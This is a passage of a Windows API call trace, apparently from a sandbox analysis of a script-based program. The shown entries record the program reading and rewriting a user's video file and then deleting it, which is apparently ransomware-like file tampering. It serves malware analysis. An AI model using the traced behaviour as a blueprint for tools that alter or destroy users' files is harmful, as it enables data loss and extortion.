0x8e18b0 [0198.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.973] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8829ec70, ftCreationTime.dwHighDateTime=0x1d5e4da, ftLastAccessTime.dwLowDateTime=0x72a0d840, ftLastAccessTime.dwHighDateTime=0x1d5da45, ftLastWriteTime.dwLowDateTime=0x72a0d840, ftLastWriteTime.dwHighDateTime=0x1d5da45, nFileSizeHigh=0x0, nFileSizeLow=0xf9ea, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="5sGE4.mkv", cAlternateFileName="")) returned 0x90af58 [0198.973] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0198.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.974] CharLowerBuffW (in: lpsz="byte[63978]", cchLength=0xb | out: lpsz="byte[63978]") returned 0xb [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0198.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf9ea) returned 0xbca008 [0198.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0198.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0198.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0198.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0198.975] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0198.975] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0198.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0198.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.975] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0198.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0198.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0198.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1b60 [0198.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1b60, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0198.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0198.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0198.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0198.976] FreeLibrary (hLibModule=0x75c90000) returned 1 [0198.976] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0198.976] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.976] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0198.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0198.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd798, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0198.977] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\5sge4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.977] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.977] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0198.977] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.977] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0198.977] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0198.977] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.978] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.978] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0198.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd8d0 [0198.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd8d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0198.978] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.978] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.979] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.979] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.979] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0198.979] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0198.979] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.979] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.979] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0198.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0198.980] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.980] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.980] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0198.980] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0198.980] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.980] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv", lpFilePart=0x0) returned 0x3c [0198.980] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8829ec70, ftCreationTime.dwHighDateTime=0x1d5e4da, ftLastAccessTime.dwLowDateTime=0x72a0d840, ftLastAccessTime.dwHighDateTime=0x1d5da45, ftLastWriteTime.dwLowDateTime=0x1b7dc4a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf9ea, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="5sGE4.mkv", cAlternateFileName="")) returned 0x90af58 [0198.981] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\5sge4.mkv")) returned 1 [0198.983] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8829ec70, ftCreationTime.dwHighDateTime=0x1d5e4da, ftLastAccessTime.dwLowDateTime=0x72a0d840, ftLastAccessTime.dwHighDateTime=0x1d5da45, ftLastWriteTime.dwLowDateTime=0x1b7dc4a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf9ea, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="5sGE4.mkv", cAlternateFileName="")) returned 0 [0198.983] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.985] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.985] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0198.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0198.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0198.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.986] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.986] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0198.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0198.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.986] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.987] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.988] RtlAllocateHeap 